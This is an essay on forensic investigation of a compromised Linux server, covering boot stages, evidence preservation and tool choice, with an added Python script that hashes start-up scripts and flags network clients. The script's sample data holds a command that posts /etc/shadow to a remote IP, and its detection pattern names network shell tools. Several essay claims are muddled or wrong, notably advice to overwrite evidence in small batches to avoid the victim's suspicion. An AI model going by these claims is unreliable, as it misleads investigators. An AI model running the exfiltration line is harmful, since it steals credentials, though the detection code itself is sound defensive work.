Computer Crime Activities
As computers have come to play a larger role in the modern world, computer crime has increased with them. Criminals have used computers to commit crimes such as hacking to obtain information. In response, the FBI and police have developed systems for dealing with such criminal activity. The case examined here is an attack on a Linux server in which the Linux boot process fails. Keeping pace with day-to-day technological development, GreenWind develops the integration of small wind turbines, and a Linux server is used in that integration process to conduct the required research. During this work the Linux server was shut down for a while for maintenance and later rebooted. It was during the reboot that the machine's programmer noticed something suspicious: some programs were sending information to an attacker (Broucek & Turner, 2001).
The Linux boot process has several steps that help in building the investigation of a rogue security program. At the start (reboot) of a computer, warnings are displayed that help the investigator to look for the program in question. When the start button is pressed, the computer produces warning signs that give information about security measures. This is the right time for investigators to look at the criminal information that helps develop the investigation. Investigators must trace and evaluate the IP address of the incriminating computer. During the Linux kernel stage of the boot process, investigators get a clue about the rogue program because some of the kernel programs that are executed provide relevant information. The drivers present in the temporary root file system aid in gathering information, because the way the entire system is mounted gives access to information in all parts of the system. At the runlevel stage, programs are run and executed, and here investigators can get a clue about rogue programs that send important information back to attackers (Broucek & Turner, 2001).
In any kind of investigation, evidence should be preserved so that it can provide valid information in a court of law. One of the main steps in preserving and protecting evidence from being violated is transferring and transporting the evidence equipment in the right manner. The best way of storing evidence in such a situation is to use storage materials that do not create unfavorable conditions that could affect the equipment holding the evidence. Data should be collected and preserved in a way that prevents it from being violated by a third party. To achieve this, all of the computer's connections should be disconnected in order to stop any form of information violation that may develop. Once the computer's connections are stopped, it becomes much easier to preserve information relevant to the case. The victim's computer may be connected to another computer so as to record information for further investigation. Overwriting of evidence should be carried out in small batches so as to prevent suspicion from the victim (Broucek & Turner, 2001).
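The runlevel-stage start-up entries described above and the preservation requirement in this paragraph can both be served by a small inventory script: it records a SHA-256 manifest of the entries so a later copy can be checked for tampering, and flags entries whose script text calls a network client. This is an added example, not part of the essay or of any tool it cites; the rc directory contents, the 203.0.113.10 address and the list of network clients treated as suspicious are constructed assumptions.

```python
# Added example (not from the essay): seal runlevel start-up entries in a hash
# manifest for later tamper checks, and flag entries that call a network client.
import hashlib
import json
import os
import re

# Constructed sample of an rc directory: two ordinary services plus a rogue entry.
SAMPLE_SCRIPTS = {
    "S20sshd": b"#!/bin/sh\nexec /usr/sbin/sshd\n",
    "S30cron": b"#!/bin/sh\nexec /usr/sbin/cron\n",
    "S99update": b"#!/bin/sh\n/usr/bin/curl -s -d @/etc/shadow http://203.0.113.10/c\n",
}
# Network clients an init script has no ordinary reason to run at boot (assumed list).
NET_CLIENT = re.compile(rb"\b(curl|wget|nc|ncat|socat)\b")

def read_runlevel_dir(rc_dir: str) -> dict:
    """Read every regular file in rc_dir (for example /etc/rc3.d) into {name: bytes}."""
    entries = {}
    for name in sorted(os.listdir(rc_dir)):
        path = os.path.join(rc_dir, name)
        if os.path.isfile(path):
            with open(path, "rb") as fh:
                entries[name] = fh.read()
    return entries

def manifest_for(entries: dict) -> dict:
    """Record size and SHA-256 of each entry: the evidence inventory."""
    return {name: {"size": len(data), "sha256": hashlib.sha256(data).hexdigest()}
            for name, data in sorted(entries.items())}

def manifest_digest(manifest: dict) -> str:
    """Hash the canonical JSON of the manifest so the inventory itself is sealed."""
    canonical = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(canonical).hexdigest()

def changed_entries(sealed: dict, current: dict) -> list:
    """Names added, removed or altered since the sealed manifest was taken."""
    return sorted(n for n in set(sealed) | set(current) if sealed.get(n) != current.get(n))

def suspicious_entries(entries: dict) -> list:
    """Entries whose script text calls a network client: candidate rogue programs."""
    return sorted(name for name, data in entries.items() if NET_CLIENT.search(data))

if __name__ == "__main__":
    m = manifest_for(SAMPLE_SCRIPTS)
    print(json.dumps(m, indent=2), "\nseal:", manifest_digest(m))
    print("suspicious:", suspicious_entries(SAMPLE_SCRIPTS))
```

On a live system, `read_runlevel_dir` on the active rc directory replaces the constructed sample, and the printed seal is what goes into the custody record.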
Different forensic tools can be used to examine evidence for the investigation. In gathering evidence for a given crime, two main types of forensic tools may be used. Hardware forensic tools, such as complete computer systems and servers and single-purpose components, are the core hardware forensic tools. Software forensic tools, on the other hand, include GUI applications and command-line applications, among others. The reliability of a forensic tool is the core consideration in choosing the tool to be used in collecting evidence (Broucek & Turner, 2001).
Broucek, V. & Turner, T. (2001). "Forensic computing: Developing a conceptual approach for an emerging academic discipline," in 5th Australian Security Research Symposium.